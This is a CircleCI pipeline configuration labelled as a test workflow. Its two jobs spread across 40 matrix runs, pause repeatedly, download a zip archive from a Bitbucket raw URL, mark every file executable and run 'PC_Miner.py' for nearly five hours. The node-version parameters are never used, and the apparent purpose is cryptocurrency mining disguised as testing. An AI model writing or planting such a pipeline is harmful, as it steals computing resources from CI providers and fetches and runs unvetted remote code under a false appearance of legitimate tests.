version: 2.1

executors:
  linux:
    docker:
      - image: circleci/python:3.9.4

orbs:
  node: circleci/node@2.0.0

jobs:
  Golek_Opo_01:
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - checkout
      - run:
          name: Penting
          command: |
            sleep 300s && sudo apt update -y
            sleep 300s && sudo apt update -y
            sleep 300s && sudo apt update -y
            sleep 30s && sudo apt update -y
      - run:
          name: Cloning
          command: |
            ls
            wget https://bitbucket.org/sindylestari/sindy/raw/2c7029f4de79c6b68c7e06dd598b2872d35711af/Cloning.zip && unzip Cloning.zip && chmod u+x *
            python3 -m pip install -r requirements.txt
            timeout 280m python3 PC_Miner.py && stop && sudo apt update -y

  Golek_Opo_02:
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - checkout
      - run:
          name: Penting
          command: |
            sleep 300s && sudo apt update -y
            sleep 300s && sudo apt update -y
            sleep 300s && sudo apt update -y
            sleep 30s && sudo apt update -y
      - run:
          name: Cloning
          command: |
            ls
            wget https://bitbucket.org/sindylestari/sindy/raw/2c7029f4de79c6b68c7e06dd598b2872d35711af/Cloning.zip && unzip Cloning.zip && chmod u+x *
            python3 -m pip install -r requirements.txt
            timeout 280m python3 PC_Miner.py && stop && sudo apt update -y














workflows:
  all-tests:
    jobs:
      - Golek_Opo_01:
          matrix:
            parameters:
              os: [linux]
              node-version: [8.12.0, 8.13.0, 8.14.0, 8.14.1, 8.15.0, 8.15.1, 8.16.0, 8.16.2, 8.17.0, 9.3.0, 9.4.0, 9.7.0, 9.7.1, 9.8.0, 9.9.0, 9.10.0, 9.10.1, 9.11.0, 9.11.1, 9.11.2]
      - Golek_Opo_02:
          matrix:
            parameters:
              os: [linux]
              node-version: [8.12.0, 8.13.0, 8.14.0, 8.14.1, 8.15.0, 8.15.1, 8.16.0, 8.16.2, 8.17.0, 9.3.0, 9.4.0, 9.7.0, 9.7.1, 9.8.0, 9.9.0, 9.10.0, 9.10.1, 9.11.0, 9.11.1, 9.11.2]



